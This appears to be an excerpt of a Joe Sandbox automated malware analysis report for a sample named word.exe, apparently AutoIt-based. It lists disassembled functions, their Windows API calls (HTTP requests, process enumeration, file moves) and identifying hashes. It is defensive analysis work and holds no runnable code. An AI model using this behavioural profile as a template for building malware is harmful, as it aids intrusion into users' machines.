                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                            • String ID: AU3_FreeVar
                                                                            • API String ID: 2184576858-771828931
                                                                            • Opcode ID: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                            • Opcode Fuzzy Hash: 111e65442873bd7cbffe48700b84114c079de58427b558a04ef4a5d95244f0f0
                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                            Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                            • DestroyWindow.USER32 ref: 0042A751
                                                                            • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                            • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 4174999648-3243417748
                                                                            • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                            • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                            • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                            • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                            Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 1291720006-3916222277
                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                            Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastselect
                                                                            • String ID: HH
                                                                            • API String ID: 215497628-2761332787
                                                                            • Opcode ID: 38832bdf1c2d69764463c59b4ea3e323505be882b78fbcfb165a57a5b6e27ccc
                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                            • Opcode Fuzzy Hash: 38832bdf1c2d69764463c59b4ea3e323505be882b78fbcfb165a57a5b6e27ccc
                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                            Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                            • API String ID: 1729044348-3708979750
                                                                            • Opcode ID: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                            • Opcode Fuzzy Hash: d504a39e3b85aa042b454773e4b791f90fae78cdff70d0edbc70f8b40f51964b
                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                            Function 00449063 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                            • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                                            • String ID: X+
                                                                            • API String ID: 1976402638-1938338529
                                                                            • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                            • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                            • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                            • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                            Function 0044849C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0$X+
                                                                            • API String ID: 3866635326-479754480
                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                            Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\word.exe,?,C:\Users\user\AppData\Roaming\word.exe,004A8E80,C:\Users\user\AppData\Roaming\word.exe,0040F3D2), ref: 0040FFCA
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                            • MoveFileW.KERNEL32 ref: 0044BC38
                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                            • _wcslen.LIBCMT ref: 0044BCCB
                                                                            • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2326526234-1173974218
                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                            Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                            • String ID: \
                                                                            • API String ID: 321622961-2967466578
                                                                            • Opcode ID: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                            • Opcode Fuzzy Hash: 3d3187412736f1559758a6cd6e40f0a594bd5d43c4c9ea1cccac3023e941b0f8
                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                            Function 0044C80C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                            • Opcode Fuzzy Hash: dc7e98e38d8725b7134af3b864f32bf76aed1b78794146943df9d66deb8fb3e7
                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                            Function 00436EC8 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                            • __wsplitpath.LIBCMT ref: 00436FA0
                                                                            • _wcscat.LIBCMT ref: 00436FB2
                                                                            • __wcsicoll.LIBCMT ref: 00436FC4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437003
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2903788889-0
                                                                            • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                            • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                            • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                            • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                            Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                            • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                            • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                            • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                            Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00401257
                                                                              • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                              • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                            • KillTimer.USER32 ref: 004012B0
                                                                            • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                            • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1792922140-0
                                                                            • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                            • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                            • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                            • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                            Function 004140DB Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 1925773019-0
                                                                            • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                            • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                            • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                            • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                            Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                            • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                            • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                            • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                            • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                            • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                            • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                            • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
